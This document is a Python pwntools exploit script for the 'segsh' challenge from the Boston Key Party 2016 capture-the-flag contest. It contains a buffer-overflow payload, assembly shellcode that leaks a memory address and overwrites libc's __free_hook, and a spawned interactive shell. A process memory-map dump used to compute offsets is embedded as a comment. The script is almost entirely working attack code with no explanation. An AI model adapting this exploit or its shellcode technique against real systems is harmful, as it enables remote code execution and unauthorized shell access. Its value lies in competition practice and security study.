Boston Key Party CTF 2016 segsh (pwn 6pts)

exploit.py

#!/usr/bin/env python
from pwn import *

context(os='linux', arch='i386')
# context.log_level = 'debug'

HOST = "segsh.bostonkey.party"
PORT = 8888

conn = None

if len(sys.argv) > 1 and sys.argv[1] == 'r':
        conn = remote(HOST, PORT)
else:
    conn = process(['./segsh', '0'], env={'LD_PRELOAD': './libc-2.19.so'})
    # conn = process(['./segsh', '0'])

addr_read = 0x6f
addr_exit = 0x10
addr_buffer = 0x10000

log.info("Pwning")

conn.recvuntil('__')

conn.send('install -i echo\n')
conn.recvuntil('__')

conn.send('exec -e echo\n')
conn.recvuntil('Input string: ')

exploit = 'A'*(0x400 - 8)
exploit += pack(addr_buffer)
exploit += pack(addr_read)
exploit += pack(0x0)
exploit += pack(-0x2000)
exploit += pack(0x2000)

conn.send(exploit)
_ = conn.recvn(0x40c)


"""
f752f000-f7531000 rwxs 00000000 00:04 74994                              /dev/zero (deleted)
f7541000-f7543000 rw-s 00000000 00:04 74995                              /dev/zero (deleted)
f7543000-f754b000 rwxs 00014000 00:04 74994                              /dev/zero (deleted)
f754b000-f754c000 rw-p 00000000 00:00 0
f754c000-f7553000 r-xp 00000000 00:26 8426                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f7553000-f755b000 rw-s 00000000 00:04 74996                              /dev/zero (deleted)
f755b000-f76f4000 r-xp 0000f000 00:26 8426                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f4000-f76f6000 r--p 001a8000 00:26 8426                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f6000-f76f7000 rw-p 001aa000 00:26 8426                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/libc-2.19.so
f76f7000-f76fc000 rw-p 00000000 00:00 0
f76fc000-f76fd000 r-xp 00000000 00:00 0                                  [vdso]
f76fd000-f76ff000 r--p 00000000 00:00 0                                  [vvar]
f76ff000-f771f000 r-xp 00000000 08:01 397808                             /lib/i386-linux-gnu/ld-2.19.so
f771f000-f7720000 r--p 0001f000 08:01 397808                             /lib/i386-linux-gnu/ld-2.19.so
f7720000-f7721000 rw-p 00020000 08:01 397808                             /lib/i386-linux-gnu/ld-2.19.so
f7721000-f7725000 r-xp 00000000 00:26 8430                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7725000-f7726000 r--p 00003000 00:26 8430                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7726000-f7727000 rw-p 00004000 00:26 8430                               /mnt/hgfs/icchy/Documents/ctf/bkp/segsh/405b72ee16deada7a9f899cef8a7e0e5/segsh
f7727000-f7748000 rw-p 00000000 00:00 0                                  [heap]
ffdac000-ffdcd000 rw-p 00000000 00:00 0                                  [stack]
"""

libc = ELF('./libc-2.19.so')

ofs_libc = 0x20000 - 0x1000 - 0x4000
ofs_segsh = ofs_libc + (0xf7721000 - 0xf754c000)
ofs_rwx = ofs_libc + (0xf752f000 - 0xf754c000)

libc_binsh = next(libc.search('/bin/sh'))
libc_system = libc.symbols['system']
libc_freehook = libc.symbols['__free_hook']

shellcode = '\x90' * 0x100
shellcode += asm("""
mov eax, SYS_write
mov ebx, STDOUT_FILENO
mov ecx, {ofs_segsh}+0x5060
mov edx, 4
int 0x80 

mov eax, SYS_read
mov ebx, STDIN_FILENO
mov ecx, {ofs_libc}+{libc_freehook}
mov edx, 4
int 0x80

mov eax, 1
mov ebx, 0
int 0x80
""".format(**locals()))

shellcode += "\x90"*0x1000 
shellcode += asm(shellcraft.sh())

conn.send(shellcode)

rwx_addr = unpack(conn.recvn(4))
log.info('rwx_addr: '+hex(rwx_addr))

time.sleep(0.1)
conn.send(pack(rwx_addr+0x1000))

conn.interactive()